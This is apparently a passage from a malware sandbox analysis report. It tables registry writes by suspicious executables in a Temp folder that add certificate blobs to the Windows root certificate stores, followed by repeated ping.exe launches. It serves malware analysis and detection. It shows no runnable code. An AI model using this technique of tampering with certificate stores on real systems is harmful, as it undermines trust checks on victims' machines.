040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d4624030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A | C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | C:\Users\Admin\AppData\Local\Temp\a\AzureConnect.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
